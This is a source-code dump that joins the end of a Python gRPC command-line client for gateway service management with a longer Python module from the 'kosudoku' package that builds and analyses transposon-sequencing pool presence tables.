help='Service')
# Add function callbacks
parser_start.set_defaults(func=start_services)
parser_stop.set_defaults(func=stop_services)
parser_reboot.set_defaults(func=reboot)
parser_restart.set_defaults(func=restart_services)
parser_ping.set_defaults(func=ping)
parser_traceroute.set_defaults(func=traceroute)
parser_get_id.set_defaults(func=get_gateway_id)
parser_generic_command.set_defaults(func=generic_command)
parser_tail_logs.set_defaults(func=tail_logs)
return parser
def main():
parser = create_parser()
# Parse the args
args = parser.parse_args()
if not args.cmd:
parser.print_usage()
exit(1)
# Execute the subcommand function
args.func(args, magmad_pb2_grpc.MagmadStub, 'magmad')
if __name__ == "__main__":
main()
|
python
|
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
# Functions for handling pool presence table analysis
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
from kosudoku.utils import gSeparatorString, UpdateLogFileData
from kosudoku.output import generateOutputMatrixWithHeaders, writeOutputMatrix
from kosudoku.grid import SudokuGenomicCoord, CalculateSudokuGridOccupancyTaxonomy, \
PrintSudokuGridOccupancyTaxonomy
# ------------------------------------------------------------------------------------------------ #
def GenerateDTypeArrayForPoolPresenceTableImport(poolColumns):
import pdb
from numpy import int32
dtypeArray = []
i = 0
while i < len(poolColumns):
dtypeArray.append((poolColumns[i], int32))
i += 1
return dtypeArray
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateDTypeArrayForPoolPresenceDict(indexLookupTable):
import pdb
from numpy import int32
poolNames = indexLookupTable.values()
poolNames = sorted(poolNames)
dtypeArray = []
dtypeArray.append(('readAlignmentCoord', int32))
# Add in columns for pools
i = 0
while i < len(poolNames):
dtypeArray.append((poolNames[i], int32))
i += 1
return dtypeArray
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GeneratePoolPresenceTable(uniqueCoords, sortedValidGenomeArray, indexLookupTable, dtypeDict):
import numpy
import pdb
try:
poolPresenceTable = numpy.zeros(len(uniqueCoords), dtype=dtypeDict)
except:
pdb.set_trace()
i = 0
while i < len(uniqueCoords):
poolPresenceTable[i] = uniqueCoords[i]
i += 1
i = 0
j = 0
while j < len(uniqueCoords):
while(i < len(sortedValidGenomeArray) and \
sortedValidGenomeArray[i]['readAlignmentCoord'] == poolPresenceTable[j]['readAlignmentCoord']):
index = str(sortedValidGenomeArray[i]['index'])
column = indexLookupTable[index]
poolPresenceTable[j][column] += 1
i += 1
j += 1
return poolPresenceTable
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def ImportPoolPresenceTable(poolPresenceTableFileName, poolColumns):
import numpy
import gc
from pdb import set_trace
import csv
fHandle = open(poolPresenceTableFileName, 'r')
poolColumnToHeaderIndexDict = {}
i = 0
datareader = csv.reader(fHandle)
for row in datareader:
if i == 0:
headers = row
poolColumnToHeaderIndexDict = {}
for col in poolColumns:
poolColumnToHeaderIndexDict[col] = headers.index(col)
i += 1
fHandle.close()
dtypeArray = GenerateDTypeArrayForPoolPresenceTableImport(poolColumns)
poolPresenceTable = numpy.zeros(i-1, dtype=dtypeArray)
i = 0
colKeys = list(poolColumnToHeaderIndexDict.keys())
colIndices = []
while i < len(colKeys):
colIndices.append(poolColumnToHeaderIndexDict[colKeys[i]])
i += 1
fHandle = open(poolPresenceTableFileName, 'r')
i = 0
datareader = csv.reader(fHandle)
for row in datareader:
if i > 0:
j = 0
while j < len(colKeys):
poolPresenceTable[i-1][colKeys[j]] = row[colIndices[j]]
j += 1
i += 1
fHandle.close()
return poolPresenceTable
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def WritePoolPresenceTable3(filename, poolPresenceTable, poolColumns):
fhandle = open(filename, 'w')
# Write out the header line
headerLine = ''
i = 0
while i < len(poolColumns):
headerLine += poolColumns[i]
if i < len(poolColumns) - 1:
headerLine += ','
i += 1
headerLine += '\n'
totalStr = ''
i = 0
while i < poolPresenceTable.shape[0]:
outputStr = ''
j = 0
while j < len(poolColumns):
outputStr += str(poolPresenceTable[i][poolColumns[j]])
if j < len(poolColumns) - 1:
outputStr += ','
j += 1
outputStr += '\n'
totalStr += outputStr
i += 1
writeStr = headerLine + totalStr
fhandle.write(writeStr)
fhandle.close()
return
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateBlankPhysicalAddressDict(poolPresenceTable):
uniqueCoords = poolPresenceTable['readAlignmentCoord']
physicalAddressDict = {}
i = 0
while i < len(uniqueCoords):
physicalAddressDict[int(uniqueCoords[i])] = []
i += 1
return physicalAddressDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def FindAddressCoords(poolPresenceTableLine, axisPools, threshold=5):
axisAddresses = []
i = 0
while i < len(axisPools):
if poolPresenceTableLine[axisPools[i]] >= threshold:
axisAddresses.append([axisPools[i], poolPresenceTableLine[axisPools[i]]])
i += 1
return axisAddresses
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def FindAddressCoords2(poolPresenceTableLine, axisPools, threshold=5):
# Very much the same as FindAddressCoords, but returns a list of just axis addresses and a
# dict of the read counts for each of these axis addresses, rather than combining this dict
# into the axisAddresses array
axisAddresses = []
axisAddressScoreDict = {}
i = 0
while i < len(axisPools):
if poolPresenceTableLine[axisPools[i]] >= threshold:
axisAddresses.append(axisPools[i])
axisAddressScoreDict[axisPools[i]] = poolPresenceTableLine[axisPools[i]]
i += 1
return [axisAddresses, axisAddressScoreDict]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePoolCoordsForLine(poolPresenceTableLine, rowPools, colPools, prPools, \
pcPools, controlPools, threshold=5):
# Very much like CalculatePhysicalAddressCoordsForLine but also reports contents of control pools
# as well.
# Used in generation of pool presence table taxonomy
addresses_r = FindAddressCoords2(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords2(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords2(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords2(poolPresenceTableLine, pcPools, threshold=threshold)
if controlPools != None:
addresses_control = FindAddressCoords2(poolPresenceTableLine, controlPools, \
threshold=threshold)
else:
addresses_control = None
# Remember, each line in the addresses array is a 2 element list, the first containing the pool
# name, and the second containing the number of reads associated with it.
return [addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateNumberOfPoolAxesThatHaveMoreThanOneEntry(addresses_r, addresses_c, \
addresses_pr, addresses_pc, addresses_control):
nRowPoolAxisEntries = len(addresses_r[0])
nColPoolAxisEntries = len(addresses_c[0])
nPRPoolAxisEntries = len(addresses_pr[0])
nPCPoolAxisEntries = len(addresses_pc[0])
nAddressPoolAxesWithMoreThanOneEntry = 0
if nRowPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
if nColPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
if nPRPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
if nPCPoolAxisEntries > 1:
nAddressPoolAxesWithMoreThanOneEntry += 1
return nAddressPoolAxesWithMoreThanOneEntry
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateNumberOfPoolAxesThatHaveEntries(addresses_r, addresses_c, addresses_pr, addresses_pc, \
addresses_control):
# Used in generation of pool presence table taxonomy
# Used to calculate how many lines can be used to calculate library addresses
nRowPoolAxisEntries = len(addresses_r[0])
nColPoolAxisEntries = len(addresses_c[0])
nPRPoolAxisEntries = len(addresses_pr[0])
nPCPoolAxisEntries = len(addresses_pc[0])
nAddressPoolAxesWithEntries = 0
if nRowPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if nColPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if nPRPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if nPCPoolAxisEntries > 0:
nAddressPoolAxesWithEntries += 1
if addresses_control != None:
nControlPoolsWithEntries = len(addresses_control[0])
else:
nControlPoolsWithEntries = 0
return [nAddressPoolAxesWithEntries, nControlPoolsWithEntries]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, addresses_pc):
# Calculate the unambiguous library addresses that that a read alignment coord maps to
# The score is the total number of reads that are associated with the library address assignment
possibleAddresses = []
for address_r in addresses_r:
for address_c in addresses_c:
for address_pr in addresses_pr:
for address_pc in addresses_pc:
row = address_r[0]
row_score = address_r[1]
col = address_c[0]
col_score = address_c[1]
pr = address_pr[0]
pr_score = address_pr[1]
pc = address_pc[0]
pc_score = address_pc[1]
possibleAddress = row + '_' + col + '_' + pr + '_' + pc
possibleAddressScore = row_score + col_score + pr_score + pc_score
possibleAddresses.append([possibleAddress, possibleAddressScore])
return possibleAddresses
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateLibraryAddressesForPoolPresenceTableLine(poolPresenceTableLine, rowPools, colPools, \
prPools, pcPools, threshold=5):
# Used in generation of pool presence table taxonomy
# Used to calculate possible addresses for pool presence table line
coord = int(poolPresenceTableLine['readAlignmentCoord'])
addresses_r = FindAddressCoords(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords(poolPresenceTableLine, pcPools, threshold=threshold)
possibleAddresses = CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, \
addresses_pc)
return possibleAddresses
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateLibraryAddressesForPoolPresenceTableLine2(poolPresenceTableLine, rowPools, colPools, \
prPools, pcPools, logReadNumberRatioHistogramFitDict, logReadNumberRatioHistogramIntegralDict, \
threshold):
# Used in generation of pool presence table taxonomy
# Used to calculate possible addresses for pool presence table line
coord = int(poolPresenceTableLine['readAlignmentCoord'])
addresses_r = FindAddressCoords(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords(poolPresenceTableLine, pcPools, threshold=threshold)
possibleAddressesAndScores = \
CalculatePossibleAddresses2(addresses_r, addresses_c, addresses_pr, addresses_pc, \
logReadNumberRatioHistogramFitDict, logReadNumberRatioHistogramIntegralDict)
return possibleAddressesAndScores
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateNumberOfEntriesInPoolAxes(addresses_r, addresses_c, \
addresses_pr, addresses_pc):
import pdb
nRowCoords = len(addresses_r[0])
nColCoords = len(addresses_c[0])
nPRCoords = len(addresses_pr[0])
nPCCoords = len(addresses_pc[0])
# pdb.set_trace()
return [nRowCoords, nColCoords, nPRCoords, nPCCoords]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateMaxNumberOfEntriesInSinglePoolAxis(addresses_r, addresses_c, \
addresses_pr, addresses_pc):
# This function finds the pool axis with the most coordinate entries and reports this number
# This number is important for guessing how many library addresses an ambiguous line might map to
# It is the minimum number of addresses that the line could map to.
nRowPoolAxisEntries = len(addresses_r[0])
nColPoolAxisEntries = len(addresses_c[0])
nPRPoolAxisEntries = len(addresses_pr[0])
nPCPoolAxisEntries = len(addresses_pc[0])
poolAxisEntries = [nRowPoolAxisEntries, nColPoolAxisEntries, nPRPoolAxisEntries, \
nPCPoolAxisEntries]
maxEntriesInSingleAddressPoolAxis = max(poolAxisEntries)
return maxEntriesInSingleAddressPoolAxis
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
# Functions for calculating a Voigt function to a read ratio histogram
def voigtFunction(x, p):
from scipy.special import erfc
from numpy import exp
from numpy import sqrt
from numpy import pi, float64
a = p[0]
c = p[1]
delta = p[2]
sigma = p[3]
firstArg = ((-1.j)*(-c + x) + delta)/(sqrt(2)*sigma)
secondArg = ((1.j)*(-c + x) + delta)/(sqrt(2)*sigma)
voigtEquation = a\
*(exp(firstArg**2)*erfc(firstArg) \
+ exp(secondArg**2)*erfc(secondArg) ) \
/ (2*sqrt(2*pi)*sigma)
voigtEquation = float64(voigtEquation)
return voigtEquation
def voigtResiduals(p, y, x):
err = y - voigtFunction(x,p)
return err
def voigtFit(x,y, p0):
import scipy
from scipy.optimize import leastsq
plsq = leastsq(voigtResiduals, p0, args=(y, x), maxfev=2000)
return [plsq[0], voigtFunction(x, plsq[0])]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateVoigtScore(logNRatio, plsq, normalizationFactor):
voigtScore = voigtFunction(logNRatio, plsq)/normalizationFactor
return voigtScore
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePossibleAddresses2(addresses_r, addresses_c, addresses_pr, addresses_pc, plsqDict, \
normalizationFactorDict):
# Calculate the unambiguous library addresses that that a read alignment coord maps to
# Same as CalculatePossibleAddresses
# However, the reported score is slightly different. It is a collection of the ratios of pool axes
# entries.
# Bookmark: this is where I'll add the Voigt function
import numpy
import pdb
possibleAddressesAndScores = []
for address_r in addresses_r:
for address_c in addresses_c:
for address_pr in addresses_pr:
for address_pc in addresses_pc:
row = address_r[0]
col = address_c[0]
pr = address_pr[0]
pc = address_pc[0]
possibleAddress = row + '_' + col + '_' + pr + '_' + pc
nRowReads = address_r[1]
nColReads = address_c[1]
nPRReads = address_pr[1]
nPCReads = address_pc[1]
totalReads = nRowReads + nColReads + nPRReads + nPCReads
nr2nc = nRowReads/nColReads
nr2npr = nRowReads/nPRReads
nr2npc = nRowReads/nPCReads
nc2npr = nColReads/nPRReads
nc2npc = nColReads/nPCReads
npr2npc = nPRReads/nPCReads
logNr2nc = numpy.log(nr2nc)
logNr2npr = numpy.log(nr2npr)
logNr2npc = numpy.log(nr2npc)
logNc2npr = numpy.log(nc2npr)
logNc2npc = numpy.log(nc2npc)
logNpr2npc = numpy.log(npr2npc)
voigtScoreNr2nc = CalculateVoigtScore(logNr2nc, plsqDict['nr2nc'], \
normalizationFactorDict['nr2nc'])
voigtScoreNr2npr = CalculateVoigtScore(logNr2npr, plsqDict['nr2npr'], \
normalizationFactorDict['nr2npr'])
voigtScoreNr2npc = CalculateVoigtScore(logNr2npc, plsqDict['nr2npc'], \
normalizationFactorDict['nr2npc'])
voigtScoreNc2npr = CalculateVoigtScore(logNc2npr, plsqDict['nc2npr'], \
normalizationFactorDict['nc2npr'])
voigtScoreNc2npc = CalculateVoigtScore(logNc2npc, plsqDict['nc2npc'], \
normalizationFactorDict['nc2npc'])
voigtScoreNpr2npc = CalculateVoigtScore(logNpr2npc, plsqDict['npr2npc'], \
normalizationFactorDict['npr2npc'])
scoreDict = {'nr2nc':voigtScoreNr2nc, 'nr2npr':voigtScoreNr2npr, \
'nr2npc':voigtScoreNr2npc, 'nc2npr':voigtScoreNc2npr, \
'nc2npc':voigtScoreNc2npc, 'npr2npc':voigtScoreNpr2npc}
logReadCountRatioDict = {'logNr2nc':logNr2nc, 'logNr2npr':logNr2npr, \
'logNr2npc':logNr2npc, 'logNc2npr':logNc2npr, 'logNc2npc':logNc2npc, \
'logNpr2npc':logNpr2npc}
score = voigtScoreNr2nc * voigtScoreNr2npr * voigtScoreNr2npc \
* voigtScoreNc2npr * voigtScoreNc2npc * voigtScoreNpr2npc
possibleAddressesAndScores.append([possibleAddress, scoreDict, score, \
totalReads, logReadCountRatioDict])
return possibleAddressesAndScores
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePhysicalAddresses(poolPresenceTable, rowPools, colPools, prPools, pcPools, \
threshold=5):
physicalAddressDict = GenerateBlankPhysicalAddressDict(poolPresenceTable)
i = 0
while i < len(poolPresenceTable):
entry = poolPresenceTable[i]
coord = int(poolPresenceTable[i]['readAlignmentCoord'])
addresses_r = FindAddressCoords(poolPresenceTable[i], rowPools, threshold=threshold)
addresses_c = FindAddressCoords(poolPresenceTable[i], colPools, threshold=threshold)
addresses_pr = FindAddressCoords(poolPresenceTable[i], prPools, threshold=threshold)
addresses_pc = FindAddressCoords(poolPresenceTable[i], pcPools, threshold=threshold)
possibleAddresses = CalculatePossibleAddresses(addresses_r, addresses_c, addresses_pr, \
addresses_pc)
physicalAddressDict[coord] = possibleAddresses
i += 1
return physicalAddressDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePhysicalAddressCoordsForLine(poolPresenceTableLine, rowPools, colPools, prPools, \
pcPools, threshold=5):
addresses_r = FindAddressCoords2(poolPresenceTableLine, rowPools, threshold=threshold)
addresses_c = FindAddressCoords2(poolPresenceTableLine, colPools, threshold=threshold)
addresses_pr = FindAddressCoords2(poolPresenceTableLine, prPools, threshold=threshold)
addresses_pc = FindAddressCoords2(poolPresenceTableLine, pcPools, threshold=threshold)
# Remember, each line in the addresses array is a 2 element list, the first containing the pool
# name, and the second containing the number of reads associated with it.
return [addresses_r, addresses_c, addresses_pr, addresses_pc]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateAverageReadAlignmentCoordinate(group, rowPools, colPools, prPools, pcPools, \
averagingType='median'):
import numpy
from pdb import set_trace
import scipy.stats
# Calculate the median and mean read alignment coordinate
[readAlignmentCoords, totalReads] = \
GenerateHistogramOfReadsVersusReadAlignmentCoord(group, rowPools, colPools, prPools, pcPools)
readAlignmentCoordList = []
i = 0
while i < len(totalReads):
j = 0
while j < totalReads[i]:
readAlignmentCoordList.append(readAlignmentCoords[i])
j += 1
i += 1
# set_trace()
# print(str(readAlignmentCoordList))
if len(readAlignmentCoordList) == 0:
averageReadAlignmentCoord = 0
includeInSummedTable = False
elif averagingType == 'median':
averageReadAlignmentCoord = int(numpy.median(readAlignmentCoordList))
includeInSummedTable = True
elif averagingType == 'mode':
averageReadAlignmentCoord = int(scipy.stats.mode(readAlignmentCoordList))
includeInSummedTable = True
elif averagingType == 'mean':
averageReadAlignmentCoord = int(numpy.mean(readAlignmentCoordList))
includeInSummedTable = True
else:
averageReadAlignmentCoord = int(numpy.median(readAlignmentCoordList))
includeInSummedTable = True
return [averageReadAlignmentCoord, includeInSummedTable]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateHistogramOfReadsVersusReadAlignmentCoord(groupedPoolPresenceTableGroup, \
rowPools, colPools, prPools, pcPools):
i = 0
readAlignmentCoords = []
totalReads = []
while i < len(groupedPoolPresenceTableGroup):
readAlignmentCoord = groupedPoolPresenceTableGroup[i]['readAlignmentCoord']
readAlignmentCoords.append(readAlignmentCoord)
readCount = \
CountReadsAssociatedWithCoordinateThatAreInLocationPools(groupedPoolPresenceTableGroup[i],\
rowPools, colPools, prPools, pcPools)
totalReads.append(readCount)
i += 1
return [readAlignmentCoords, totalReads]
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CountReadsAssociatedWithCoordinateThatAreInLocationPools(groupedPoolPresenceTableGroupLine,\
rowPools, colPools, prPools, pcPools):
totalReads = 0
i = 0
while i < len(rowPools):
totalReads += groupedPoolPresenceTableGroupLine[rowPools[i]]
i += 1
i = 0
while i < len(colPools):
totalReads += groupedPoolPresenceTableGroupLine[colPools[i]]
i += 1
i = 0
while i < len(prPools):
totalReads += groupedPoolPresenceTableGroupLine[prPools[i]]
i += 1
i = 0
while i < len(pcPools):
totalReads += groupedPoolPresenceTableGroupLine[pcPools[i]]
i += 1
return totalReads
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CountReadsAssociatedWithLineBooleanOperation(axisCoordIntersections, nextLineCoords, \
currentLineCoords):
readsCount = 0
for coord in axisCoordIntersections:
if coord in nextLineCoords[0]:
readsCount += nextLineCoords[1][coord]
if coord in currentLineCoords[0]:
readsCount += currentLineCoords[1][coord]
return readsCount
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculateTotalReadsInLine(poolPresenceTableLine, rowPools, colPools, prPools, pcPools, \
controlPools):
i = 0
totalReads = 0
while i < len(rowPools):
totalReads += poolPresenceTableLine[rowPools[i]]
i +=1
i = 0
while i < len(colPools):
totalReads += poolPresenceTableLine[colPools[i]]
i +=1
i = 0
while i < len(prPools):
totalReads += poolPresenceTableLine[prPools[i]]
i +=1
i = 0
while i < len(pcPools):
totalReads += poolPresenceTableLine[pcPools[i]]
i +=1
if controlPools != None:
i = 0
while i < len(controlPools):
totalReads += poolPresenceTableLine[controlPools[i]]
i +=1
return totalReads
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def CalculatePoolPresenceTableTaxonomyDict(poolPresenceTable, rowPools, colPools, prPools, \
pcPools, controlPools, threshold):
keysInPrintOrder = [\
'totalLines',\
'linesThatMapToLibraryAddresses',\
'linesThatMapToSingleLibraryAddresses',\
'linesThatMapToMultipleLibraryAddresses',\
'linesThatMapToUnambiguousLibraryAddresses',\
'linesThatMapToAmbiguousLibraryAddresses', \
'linesThatDoNotMapToLibraryAddresses',\
'linesThatHaveNoReadsAboveThresholdInAnyPool',\
'linesThatMapToControlIndexesOnly',\
'linesThatHaveCoordinatesInNoPoolAxis',\
'linesThatHaveCoordinatesInOnlyOnePoolAxis',\
'linesThatHaveCoordinatesInOnlyTwoPoolAxes',\
'linesThatHaveCoordinatesInOnlyThreePoolAxes',\
'totalReads']
# Define the pool presence line taxonomy dict
poolPresenceTableTaxonomyDict = {}
for key in keysInPrintOrder:
poolPresenceTableTaxonomyDict[key] = 0
poolPresenceTablePoolsCoordsList = {}
possibleAddressesDict = {}
numberPoolAxesWithEntriesForLine = {}
numberPoolAxesWithMoreThanOneEntry = {}
i = 0
while i < len(poolPresenceTable):
readsInLine = CalculateTotalReadsInLine(poolPresenceTable[i], \
rowPools, colPools, prPools, pcPools, controlPools)
poolPresenceTableTaxonomyDict['totalReads'] += readsInLine
coord = int(poolPresenceTable[i]['readAlignmentCoord'])
poolPresenceTableTaxonomyDict['totalLines'] += 1
possibleAddresses = CalculateLibraryAddressesForPoolPresenceTableLine(\
poolPresenceTable[i], rowPools, colPools, prPools, pcPools, threshold=threshold)
lenPossibleAddresses = len(possibleAddresses)
[addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control] = \
CalculatePoolCoordsForLine(\
poolPresenceTable[i], rowPools, colPools, prPools, pcPools, controlPools, threshold=threshold)
poolCoordsForLine = [addresses_r, addresses_c, addresses_pr, addresses_pc, addresses_control]
[nAddressPoolAxesWithEntries, nControlPoolsWithEntries] = \
CalculateNumberOfPoolAxesThatHaveEntries(addresses_r, addresses_c, addresses_pr, addresses_pc, \
addresses_control)
# Calculate if there will be an ambiguous library address calculation by calculating the number
# of pool axes with more than one entry. One axis with multiple (even if possible coords are
# filled) is fine, but more axis with more than one entry leads to cross terms that are
# ambiguous.
nAddressPoolAxesWithMoreThanOneEntry = \
CalculateNumberOfPoolAxesThatHaveMoreThanOneEntry(addresses_r, addresses_c, addresses_pr, \
addresses_pc, addresses_control)
if (nAddressPoolAxesWithEntries == 0) and (nControlPoolsWithEntries == 0):
poolPresenceTableTaxonomyDict['linesThatHaveNoReadsAboveThresholdInAnyPool'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 0) and (nControlPoolsWithEntries > 0):
poolPresenceTableTaxonomyDict['linesThatMapToControlIndexesOnly'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 1):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInOnlyOnePoolAxis'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 2):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInOnlyTwoPoolAxes'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 3):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInOnlyThreePoolAxes'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if (nAddressPoolAxesWithEntries == 0):
poolPresenceTableTaxonomyDict['linesThatHaveCoordinatesInNoPoolAxis'] += 1
if lenPossibleAddresses != 0:
print(str(coord))
if nAddressPoolAxesWithMoreThanOneEntry > 1 and lenPossibleAddresses >= 1:
poolPresenceTableTaxonomyDict['linesThatMapToAmbiguousLibraryAddresses'] += 1
if nAddressPoolAxesWithMoreThanOneEntry <= 1 and lenPossibleAddresses >= 1:
poolPresenceTableTaxonomyDict['linesThatMapToUnambiguousLibraryAddresses'] += 1
if lenPossibleAddresses == 0:
poolPresenceTableTaxonomyDict['linesThatDoNotMapToLibraryAddresses'] += 1
elif lenPossibleAddresses == 1:
poolPresenceTableTaxonomyDict['linesThatMapToSingleLibraryAddresses'] += 1
poolPresenceTableTaxonomyDict['linesThatMapToLibraryAddresses'] += 1
elif lenPossibleAddresses > 1:
poolPresenceTableTaxonomyDict['linesThatMapToMultipleLibraryAddresses'] += 1
poolPresenceTableTaxonomyDict['linesThatMapToLibraryAddresses'] += 1
i += 1
PrintPoolPresenceTableTaxonomyDict(threshold, poolPresenceTableTaxonomyDict, keysInPrintOrder)
return poolPresenceTableTaxonomyDict
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def PrintPoolPresenceTableTaxonomyDict(threshold, poolPresenceTableTaxonomyDict, keysInPrintOrder):
outputStr = ''
outputStr += 'threshold: ' + str(threshold) + '\n'
for key in keysInPrintOrder:
outputStr += key + ': ' + str(poolPresenceTableTaxonomyDict[key]) + '\n'
print(outputStr)
return
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
# Step 6: Functions for initially populating the pool presence table
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
def GenerateUniqueCoordsList(genomeArray):
from scipy import unique
coords = genomeArray['readAlignmentCoord']
uniqueCoords = unique(coords)
return uniqueCoords
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GenerateValidCoordsList(genomeArray):
import numpy
from numpy import int32
validCoords = 0
i = 0
maxReadIDLength = 15
while i < len(genomeArray):
coord = genomeArray[i]
if coord['alignmentQuality'] > 1 and coord['alignmentFound'] == 1 \
and coord['multipleAlignmentsFound'] == 0 and coord['himarRecognized'] == 1 \
and coord['index'] > 0:
validCoords += 1
readIDLength = len(coord[0])
if readIDLength > maxReadIDLength:
maxReadIDLength = readIDLength
i += 1
readIDFieldCode = 'a' + str(maxReadIDLength+2)
validGenomeArray = numpy.zeros(validCoords, \
dtype={'names':['readID', 'readAlignmentCoord', 'alignmentQuality', 'index'], \
'formats':[readIDFieldCode, int32, int32, int32, int32]})
i = 0
j = 0
while i < len(genomeArray) and j < validCoords:
coord = genomeArray[i]
if coord['alignmentQuality'] > 1 and coord['alignmentFound'] == 1 \
and coord['multipleAlignmentsFound'] == 0 and coord['himarRecognized'] == 1 \
and coord['index'] > 0 and coord['strangeFlagsSum'] == 0:
validGenomeArray[j]['readID'] = coord['readID']
validGenomeArray[j]['readAlignmentCoord'] = coord['readAlignmentCoord']
validGenomeArray[j]['alignmentQuality'] = coord['alignmentQuality']
validGenomeArray[j]['index'] = coord['index']
j += 1
i += 1
return validGenomeArray
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def GeneratePoolNameToPoolCodeLookupTable(barcodeFile):
# Note that this
barcodeFileHandle = open(barcodeFile, 'r')
barcodeFileData = barcodeFileHandle.readlines()
barcodeFileHandle.close()
indexLookupTable = {}
for line in barcodeFileData:
if line[0] != '#':
lineData = line.strip().split(',')
poolName = lineData[0]
forwardSeq = lineData[1]
revCompl = lineData[2]
barcodeNumber = lineData[3]
indexLookupTable[str(barcodeNumber)] = poolName
return indexLookupTable
# ------------------------------------------------------------------------------------------------ #
# ------------------------------------------------------------------------------------------------ #
def BuildInitialPoolPresenceTable(genomeArray, outputLog, barcodeFile, poolPresenceTableFileName):
import numpy
import pdb
outputStr = gSeparatorString
outputStr += 'Building Initial Pool Presence Table\n'
UpdateLogFileData(outputLog, outputStr)
print(outputStr)
# Compile the valid reads
outputStr = "Making Valid Genome Array\n"
UpdateLogFileData(outputLog, outputStr)
print(outputStr)
validGenomeArray = GenerateValidCoordsList(genomeArray)
validGenomeArray = numpy.sort(validGenomeArray, order='readAlignmentCoord')
# Generate the unique coordinates list
outputStr = "Generating Unique Coordinates List\n"
UpdateLogFileData(outputLog, outputStr)
print(outputStr)
uniqueCoords = GenerateUniqueCoordsList(validGenomeArray)
# Make the first round of the pool presence table
indexLookupTable = GeneratePoolNameToPoolCodeLookupTable(barcodeFile)
dtypeArray = GenerateDTypeArrayForPoolPresenceDict(indexLookupTable)
poolKeys = sorted(indexLookupTable.keys())
poolColumns = ['readAlignmentCoord']
i = 0
while i < len(poolKeys):
poolColumns.append(indexLookupTable[poolKeys[i]])
i += 1
print("Generating Pool Presence Table")
poolPresenceTable = GeneratePoolPresenceTable(uniqueCoords, validGenomeArray, \
indexLookupTable, dtypeArray)
WritePoolPresenceTable3(poolPresenceTableFileName, poolPresenceTable, poolColumns)
return poolPresenceTable
# ------------------------------------------------------------------------------------------------ #
####################################################################################################
# ------------------------------------------------------------------------------------------------ #
